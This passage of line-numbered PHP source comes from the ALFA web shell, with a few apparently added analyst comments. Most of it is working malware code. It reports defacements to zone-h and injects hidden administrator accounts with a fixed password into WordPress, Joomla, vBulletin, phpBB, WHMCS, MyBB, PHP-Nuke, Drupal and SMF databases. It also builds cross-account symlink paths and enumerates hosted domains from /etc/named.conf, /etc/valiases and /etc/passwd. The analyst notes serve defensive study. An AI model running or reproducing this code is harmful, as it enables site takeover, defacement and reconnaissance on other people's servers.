  4333. $sites[$i] = "http://".$sites[$i];
  4334. }
  4335. $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
  4336. ++$i;
  4337. }
        // The success banner is printed without inspecting any response.
  4338. echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
  4339. }
  4340. echo "</div>";
  4341. alfafooter();
  4342. }
  4343. function alfapwchanger(){
  4344. alfahead();
  4345.  
  4346. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
  4347. <center><h3>';
  4348. $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
  4349. Alfa_Create_A_Tag('pwchanger',$vals);
  4350. echo '</h3></center>';
  4351. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
  4352.  
  4353. echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
  4354. <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4355. $table = array('td1' =>
  4356.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4357.  'td2' =>
  4358.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4359.  'td3' =>
  4360.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4361.  'td4' =>
  4362.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4363.  'td5' =>
  4364.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
  4365.  'td6' =>
  4366.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4367.  'td7' =>
  4368.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4369.  'td8' =>
  4370.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4371. );
  4372. create_table($table);
  4373. echo '<p><input value=" " name="send" type="submit"></p></form>';
  4374. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  4375. $localhost = $_POST['alfa3'];
  4376. $database = $_POST['alfa4'];
  4377. $username = $_POST['alfa5'];
  4378. $password = $_POST['alfa6'];
  4379. $admin = $_POST['alfa8'];
  4380. $SQL = $_POST['alfa9'];
  4381. $prefix = $_POST['alfa10'];
  4382. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4383. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
  4384. $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
  4385. $sole = @mysqli_num_rows($solevisible);
  4386. if ($sole == 1){
  4387. $solevis = @mysqli_fetch_assoc($solevisible);
  4388. $res = $solevis['ID'];
  4389. }
  4390. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
  4391. if($solevisible){
  4392. __alert('Success... '.$admin.' is created...');}
  4393. }
  4394. }
  4395. if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
  4396.  
  4397. echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4398. $table = array('td1' =>
  4399.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4400.  'td2' =>
  4401.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4402.  'td3' =>
  4403.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4404.  'td4' =>
  4405.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4406.  'td5' =>
  4407.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
  4408.  'td6' =>
  4409.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4410.  'td7' =>
  4411.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4412.  'td8' =>
  4413.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4414. );
  4415. create_table($table);
  4416. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4417. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4418. $localhost = $_POST['alfa3'];
  4419. $database = $_POST['alfa4'];
  4420. $username = $_POST['alfa5'];
  4421. $password = $_POST['alfa6'];
  4422. $admin = $_POST['alfa8'];
  4423. $SQL = $_POST['alfa9'];
  4424. $prefix = $_POST['alfa10'];
  4425. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4426. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4427. $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
  4428. $sole =@mysqli_num_rows($solevisible);
  4429. if ($sole == 1){
  4430. $solevis =@mysqli_fetch_assoc($solevisible);
  4431. $res = $solevis['id'];
  4432. }
  4433. $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
  4434. if($solevisible){
  4435. __alert('Success... '.$admin.' is created...');}
  4436. }
  4437. }
  4438. if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
  4439.  
  4440. echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
  4441. $table = array('td1' =>
  4442.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4443.  'td2' =>
  4444.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4445.  'td3' =>
  4446.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4447.  'td4' =>
  4448.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4449.  'td5' =>
  4450.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4451.  'td6' =>
  4452.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4453.  'td7' =>
  4454.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4455.  'td8' =>
  4456.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4457. );
  4458. create_table($table);
  4459. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4460. if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4461. $localhost = $_POST['alfa2'];
  4462. $database = $_POST['alfa3'];
  4463. $username = $_POST['alfa5'];
  4464. $password = $_POST['alfa6'];
  4465. $prefix = $_POST['alfa7'];
  4466. $admin = $_POST['alfa8'];
  4467. $SQL = $_POST['alfa9'];
  4468. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4469. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
  4470. $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
  4471. $sole = mysqli_num_rows($solevisible);
  4472. if($sole == 1){
  4473. $solevis = mysqli_fetch_assoc($solevisible);
  4474. $res = $solevis['userid'];
  4475. }
  4476. $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
  4477. if($solevisible){
  4478. __alert('Success... '.$admin.' is created...');}
  4479. }
  4480. }
  4481. if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
  4482.  
  4483. echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4484. $table = array('td1' =>
  4485.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4486.  'td2' =>
  4487.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4488.  'td3' =>
  4489.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4490.  'td4' =>
  4491.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4492.  'td5' =>
  4493.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4494.  'td6' =>
  4495.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4496.  'td7' =>
  4497.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4498.  'td8' =>
  4499.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4500. );
  4501. create_table($table);
  4502. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4503. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4504. $localhost = $_POST['alfa2'];
  4505. $database = $_POST['alfa3'];
  4506. $username = $_POST['alfa4'];
  4507. $password = $_POST['alfa6'];
  4508. $admin = $_POST['alfa8'];
  4509. $SQL = $_POST['alfa9'];
  4510. $prefix = $_POST['alfa10'];
  4511. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4512. $hash = md5('solevisible');
  4513. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4514. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4515. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
  4516. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
  4517. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4518. if($solevisible){
  4519. __alert('Success... '.$admin.' is created...');
  4520. }
  4521. }
  4522. }
  4523. if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
  4524.  
  4525. echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
  4526. $table = array('td1' =>
  4527.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4528.  'td2' =>
  4529.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4530.  'td3' =>
  4531.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4532.  'td4' =>
  4533.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4534.  'td6' =>
  4535.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4536.  'td7' =>
  4537.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4538.  'td8' =>
  4539.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4540. );
  4541. create_table($table);
  4542. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4543. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4544. $localhost = $_POST['alfa2'];
  4545. $database = $_POST['alfa3'];
  4546. $username = $_POST['alfa4'];
  4547. $password = $_POST['alfa5'];
  4548. $admin = $_POST['alfa8'];
  4549. $SQL = $_POST['alfa9'];
  4550. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4551. $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
  4552. if($solevisible){
  4553. __alert('Success... '.$admin.' is created...');}
  4554. }
  4555. }
  4556. if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
  4557.  
  4558. echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4559. $table = array('td1' =>
  4560.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4561.  'td2' =>
  4562.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4563.  'td3' =>
  4564.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4565.  'td4' =>
  4566.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4567.  'td5' =>
  4568.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4569.  'td6' =>
  4570.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4571.  'td7' =>
  4572.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4573.  'td8' =>
  4574.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4575. );
  4576. create_table($table);
  4577. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4578. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4579. $localhost = $_POST['alfa2'];
  4580. $database = $_POST['alfa3'];
  4581. $username = $_POST['alfa4'];
  4582. $password = $_POST['alfa5'];
  4583. $admin = $_POST['alfa8'];
  4584. $SQL = $_POST['alfa9'];
  4585. $prefix = $_POST['alfa10'];
  4586. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4587. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
  4588. if($solevisible){
  4589. __alert('Success... '.$admin.' is created...');}
  4590. }
  4591. }
  4592. if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
  4593.  
  4594. echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
  4595. $table = array('td1' =>
  4596.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4597.  'td2' =>
  4598.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4599.  'td3' =>
  4600.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4601.  'td4' =>
  4602.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4603.  'td5' =>
  4604.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4605.  'td6' =>
  4606.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4607.  'td7' =>
  4608.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4609.  'td8' =>
  4610.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4611. );
  4612. create_table($table);
  4613. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4614. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4615. $localhost = $_POST['alfa2'];
  4616. $database = $_POST['alfa3'];
  4617. $username = $_POST['alfa4'];
  4618. $password = $_POST['alfa5'];
  4619. $admin = $_POST['alfa7'];
  4620. $SQL = $_POST['alfa9'];
  4621. $prefix = $_POST['alfa10'];
  4622. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4623. $hash = md5($pwd);
  4624. $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4625. if($solevisible){
  4626. __alert('Success... '.$admin.' is created...');}
  4627. }
  4628. }
  4629. if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
  4630.  
  4631. echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
  4632. $table = array('td1' =>
  4633.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4634.  'td2' =>
  4635.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4636.  'td3' =>
  4637.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4638.  'td4' =>
  4639.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4640.  'td6' =>
  4641.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4642.  'td7' =>
  4643.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
  4644.  );
  4645. create_table($table);
  4646. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4647. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4648. $localhost = $_POST['alfa2'];
  4649. $database = $_POST['alfa4'];
  4650. $username = $_POST['alfa5'];
  4651. $password = $_POST['alfa6'];
  4652. $admin = $_POST['alfa8'];
  4653. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4654. $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
  4655. $getDescuid = @mysqli_fetch_assoc($getDescuid);
  4656. $getDescuid = $getDescuid['uid'];
  4657. $getdescuid = $getDescuid++;
  4658. $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4659. $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
  4660. $sole = mysqli_num_rows($solevisible);
  4661. if ($sole == 1){
  4662. $solevis = mysqli_fetch_assoc($solevisible);
  4663. $res = $solevis['uid'];
  4664. }
  4665. $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
  4666. if($solevisible){
  4667. __alert('Success... '.$admin.' is created...');}
  4668. }
  4669. }
  4670.  
  4671. if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
  4672.  
  4673. echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
  4674. $table = array('td1' =>
  4675.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4676.  'td2' =>
  4677.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4678.  'td3' =>
  4679.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4680.  'td4' =>
  4681.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4682.  'td5' =>
  4683.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
  4684.  'td6' =>
  4685.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4686.  'td7' =>
  4687.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4688.  );
  4689. create_table($table);
  4690. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4691. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4692. $localhost = $_POST['alfa2'];
  4693. $database = $_POST['alfa3'];
  4694. $username = $_POST['alfa5'];
  4695. $password = $_POST['alfa6'];
  4696. $prefix = $_POST['alfa7'];
  4697. $admin = $_POST['alfa8'];
  4698. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4699. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
  4700. $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4701. if($solevisible){
  4702. __alert('Success... '.$admin.' is created...');}
  4703. }
  4704. }
  4705. echo "</div>";
  4706. alfafooter();
  4707. }
  // Analyst note: builds a document-root path template that contains the literal
  // placeholder {user}; alfasymlink() later substitutes account names into it.
  // Returns "/home/{user}/public_html/" when /etc/virtual/domainowners exists, or
  // when both /etc/named.conf and /etc/valiases exist. NOTE(review): those paths
  // look like DirectAdmin / cPanel layouts; confirm against the host in question.
  // Otherwise $_SERVER["DOCUMENT_ROOT"] is split on "/", its last segment is kept,
  // the last two segments are dropped, and "/{user}/" plus the kept segment is
  // appended to what remains.
  // Defensive relevance: the template is only useful where one web account can
  // reach another account's home directory. Per-account isolation (open_basedir,
  // restrictive home-directory modes) removes that precondition.
  4708. function alfaMakePwd(){
  4709.     if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
  4710.         return "/home/{user}/public_html/";
  4711.     }
  4712.     $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
  4713.     $public = end($document);
  4714.     array_pop($document);
  4715.     array_pop($document);
  4716.     $path = implode("/", $document) . "/{user}/" . $public;
  4717.     return $path;
  4718. }
  // Analyst note: gathers raw host data from which hosted domain names can be
  // derived, and reports which source answered.
  // Sources are tried in order until one yields a truthy result:
  //   /etc/named.conf (via _alfa_file), scandir of /etc/valiases/,
  //   scandir of /var/named, then /etc/passwd (via _alfa_file).
  // The $state argument is overwritten on the first line, so the value passed by
  // a caller has no effect.
  // Returns array("lines" => ..., "state" => ...), where state is one of
  // "named.conf", "valiases", "named" or "passwd".
  // NOTE(review): _alfa_file is defined elsewhere; presumably it returns the file
  // as an array of lines, since the caller iterates the result. Confirm.
  // Detection: a web-server/PHP process reading these system files is unusual for
  // an ordinary application, so file-access auditing on them is a useful signal.
  4719. function alfaGetDomains($state = false){
  4720.     $state = "named.conf";
  4721.     $lines = array();
  4722.     $lines = _alfa_file('/etc/named.conf');
  4723.     if(!$lines){
  4724.         $lines = @scandir("/etc/valiases/");
  4725.         $state = "valiases";
